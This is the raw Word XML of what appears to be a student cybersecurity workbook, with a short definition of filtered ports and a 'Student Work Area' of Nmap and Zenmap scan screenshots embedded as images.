                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Filtered ports: a port that is closed and not accepting connections, but is being filtered or blocked by a firewall or other security device.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587FA5CF" w14:textId="6412963F" w:rsidR="00DF1414" w:rsidRPr="001C411D" w:rsidRDefault="00420606" w:rsidP="00736145">
            <w:pPr>
              <w:ind w:left="851"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>When a port is filtered, the device is intentionally blocking traffic to that port to prevent unauthorized access or attacks. In contrast, when a port is unfiltered, traffic is allowed to flow freely to and from that port. It is important to note that not all filtering is necessarily malicious - legitimate security policies and configurations may result in some ports being filtered to protect the network or system from unauthorized access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63D218CF" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66E172FE" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72055CE0" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C8FF13" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6E7D70" w14:textId="45B2B17E" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Student Work Area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CF042E" w14:textId="77777777"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61BF4578" w14:textId="4EBDEF52" w:rsidR="00296CF8" w:rsidRPr="001C411D" w:rsidRDefault="00296CF8" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29013A09" w14:textId="77777777" w:rsidR="00296CF8" w:rsidRDefault="00296CF8" w:rsidP="00296CF8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1C414A" wp14:editId="6A017B70">
            <wp:extent cx="594360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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55E9636F" wp14:editId="75987ACE">
            <wp:extent cx="5943600" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75AC16BC" wp14:editId="65F12BB2">
            <wp:extent cx="5943600" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="45" name="Picture 4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screen captur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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7026402D" wp14:editId="0678E980">
            <wp:extent cx="5943600" cy="3180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7">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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A27D62" wp14:editId="5FB1070B">
            <wp:extent cx="5943600" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25682729" wp14:editId="27B31488">
            <wp:extent cx="5943600" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="48" name="Picture 4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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C276792" wp14:editId="2EBD0E6D">
            <wp:extent cx="5943600" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25DF42E4" wp14:editId="0115EFC3">
            <wp:extent cx="5943600" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="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1DCA8E21" w14:textId="7EBB5AB5" w:rsidR="00F32B5D" w:rsidRDefault="00F32B5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE9BC5" w14:textId="22589808" w:rsidR="00F32B5D" w:rsidRDefault="00F32B5D" w:rsidP="00296CF8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32651C41" wp14:editId="0E837B09">
            <wp:extent cx="5934710" cy="318262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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6B7E74" wp14:editId="2EBCF8E3">
            <wp:extent cx="5934710" cy="318262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3BCD3B9B" w14:textId="77777777" w:rsidR="00F32B5D" w:rsidRDefault="00F32B5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D15C3" w14:textId="4DB3132D" w:rsidR="00F32B5D" w:rsidRDefault="00F32B5D" w:rsidP="00F32B5D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434C397C" w14:textId="4E607FCF" w:rsidR="00F32B5D" w:rsidRPr="001C411D" w:rsidRDefault="00F32B5D" w:rsidP="00F32B5D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2745A536" wp14:editId="2DB3CA76">
            <wp:extent cx="5934710" cy="318262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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B67FEFB" wp14:editId="73D1FC2B">
            <wp:extent cx="5934710" cy="318262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0FA7852F" w14:textId="77777777" w:rsidR="00C800A5" w:rsidRPr="001C411D" w:rsidRDefault="00C800A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14738C4A" w14:textId="77777777" w:rsidR="00C800A5" w:rsidRPr="001C411D" w:rsidRDefault="00C800A5" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E05864" w14:textId="445B0C73" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00C800A5" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Zenmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11ABBB97" w14:textId="620EB627" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="00C800A5" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="307FA7C3" wp14:editId="51D48C14">
            <wp:extent cx="5943600" cy="31877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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C53AACC" wp14:editId="2E249A17">
            <wp:extent cx="5943600" cy="31877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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20CC2E7A" wp14:editId="011DD8B8">
            <wp:extent cx="5943600" cy="31877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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="541FB40B" wp14:editId="0A2F9036">
            <wp:extent cx="5943600" cy="318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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F4AECE6" wp14:editId="318DD584">
            <wp:extent cx="5943600" cy="31877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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="586F2AC4" wp14:editId="0A2993DF">
            <wp:extent cx="5943600" cy="31877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1C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC87AAB" wp14:editId="73219EDE">
            <wp:extent cx="5943600" cy="31877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0448395F" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61CD96C0" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271D2828" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249A494B" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DFA9604" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2159F424" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F7D702" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4900179B" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239671C6" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9771F3" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15FB59E3" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B40E70" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249AC8A3" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610FE8E8" w14:textId="77777777" w:rsidR="002E7D0E" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E14E512" w14:textId="0A0D2A9F" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="002E7D0E" w:rsidP="00EF04B3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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A513C" w:rsidRPr="001C411D" w14:paraId="47DC0851" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73683601"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6999AF03"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2F41688B" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FECAE75"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7C9D07CE"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67DA43C7" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35EDC680"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6D72CAC8"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1E36CD57" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EC9C927" w14:textId="51F3CE7C"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BA513C" w:rsidRPr="001C411D" w14:paraId="1A68897F" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11455C44"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5FFA24F4"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1DC2B95C" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF161CA"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653AD9CF"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bl>
    <w:p w14:paraId="524DCC1F" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00EF04B3">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04B3" w:rsidRPr="001C411D" w14:paraId="6A120830" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D9CA8F7"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4E0ACE31" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F950C10" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3"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Second phase of penetration testing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63FC889E" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF04B3" w:rsidRPr="001C411D" w14:paraId="08EA5288" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="50D0FDC4"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7CA42A5B" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
